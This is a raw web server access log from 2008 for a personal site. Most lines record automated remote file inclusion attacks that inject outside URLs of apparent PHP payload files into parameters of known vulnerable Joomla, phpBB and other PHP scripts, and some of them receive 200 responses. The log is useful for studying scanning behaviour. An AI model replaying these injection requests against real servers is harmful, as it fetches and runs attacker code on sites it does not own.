72.199.235.196 - - [12/Aug/2008:10:10:45 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
202.70.83.4 - - [12/Aug/2008:10:10:50 -0700] "GET /logs/access_071230.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:11:00 -0700] "GET /logs/access_080324.log//modules/xfsection/modify.php?dir_module=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:11:17 -0700] "GET /logs/access_080209.log//index.php?page=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:11:17 -0700] "GET /logs//index.php?page=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:11:19 -0700] "GET //index.php?page=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 200 18427 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:11:19 -0700] "GET /logs/access_080209.log//index.php?page=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:11:19 -0700] "GET /logs//index.php?page=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:11:19 -0700] "GET /logs/access_080404.log//index.php?page=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:11:21 -0700] "GET //index.php?page=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 200 18427 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:11:22 -0700] "GET /logs/access_080404.log//index.php?page=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:10:11:25 -0700] "GET /logs/index.php?meio=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:10:11:26 -0700] "GET /index.php?meio=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 200 18381 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:11:45 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
202.70.83.4 - - [12/Aug/2008:10:11:49 -0700] "GET /logs/access_080218.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:12:46 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:13:09 -0700] "GET /logs/access_080418.log//config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:13:11 -0700] "GET //config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:13:13 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:13:16 -0700] "GET /logs/index.php?opcao=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:13:18 -0700] "GET /index.php?opcao=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 200 18385 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:13:46 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
205.234.193.81 - - [12/Aug/2008:10:13:52 -0700] "GET /logs/access_080215.log//admin.php?include_path=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [12/Aug/2008:10:13:53 -0700] "GET //admin.php?include_path=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [12/Aug/2008:10:13:53 -0700] "GET /logs//admin.php?include_path=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:14:22 -0700] "GET /logs/home.php?pagina=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:14:22 -0700] "GET /home.php?pagina=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.81 - - [12/Aug/2008:10:14:34 -0700] "GET /logs/access_080119.log//admin.php?include_path=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:14:46 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.175.172.240 - - [12/Aug/2008:10:15:29 -0700] "GET http://www.dmulk.com/logs/access.log HTTP/1.0" 200 196608 "-" "-" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:15:46 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:15:55 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:15:56 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 200 18523 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:15:57 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:16:01 -0700] "GET /logs/access_080321.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:16:46 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:17:14 -0700] "GET /logs/index2.php?url_page=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:17:14 -0700] "GET /index2.php?url_page=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:17:44 -0700] "GET /logs/access_080226.log/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:17:45 -0700] "GET /errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:17:45 -0700] "GET /logs/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:17:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:17:48 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:17:50 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:18:08 -0700] "GET /logs/access_080114.log/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
68.178.171.49 - - [12/Aug/2008:10:18:11 -0700] "GET /index.php?pagina=http://www.xsenhalol.xpg.com.br/ylaslas?\r HTTP/1.0" 200 18383 "-" "Mozilla/5.0" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:18:25 -0700] "GET /logs/access.log/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:18:26 -0700] "GET /errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:18:27 -0700] "GET /logs/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:18:41 -0700] "GET /logs/access_080213.log/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:18:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:19:19 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:19:19 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:19:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:20:18 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:20:42 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:20:44 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 200 18533 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:20:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:20:48 -0700] "GET /logs/access_080131.log/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:20:48 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:20:49 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:20:49 -0700] "GET /errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:20:50 -0700] "GET /logs/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:21:05 -0700] "GET /logs/access_071225.log/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:21:14 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:21:17 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:21:45 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:21:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:22:08 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:22:09 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.8.104 - - [12/Aug/2008:10:22:13 -0700] "GET /blog/index.php/2008/?show=gallery&nggpage=3 HTTP/1.0" 200 28386 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:22:15 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:22:17 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:22:18 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:22:18 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:22:18 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:22:30 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:22:32 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:22:32 -0700] "GET /logs/access_080404.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:22:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:22:33 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:10:22:33 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/metaljaya/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:10:22:33 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/metaljaya/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:22:34 -0700] "GET /logs/access_080404.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:22:34 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:22:35 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:22:35 -0700] "GET /logs//?pag=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 60288 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:22:37 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:22:37 -0700] "GET //?pag=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.811" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:22:43 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:22:43 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:22:43 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:22:46 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:22:46 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:22:46 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:22:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:22:53 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:22:54 -0700] "GET /logs/access_080703.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:22:56 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 18483 "-" "libwww-perl/5.79" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:22:56 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 60283 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:23:16 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:23:25 -0700] "GET /logs//?p=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 60288 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:23:27 -0700] "GET //?p=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18383 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:23:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:23:52 -0700] "GET /logs/access_080329.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:10:23:52 -0700] "GET /logs/access_080219.log/errors.php?error=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:10:23:52 -0700] "GET /errors.php?error=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:10:23:52 -0700] "GET /logs/errors.php?error=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:10:23:52 -0700] "GET /logs/access.log/errors.php?error=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:23:55 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 18499 "-" "libwww-perl/5.79" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:23:55 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 60283 "-" "libwww-perl/5.79" "www.dmulk.com"
62.87.154.41 - - [12/Aug/2008:10:23:58 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [12/Aug/2008:10:23:58 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:24:17 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
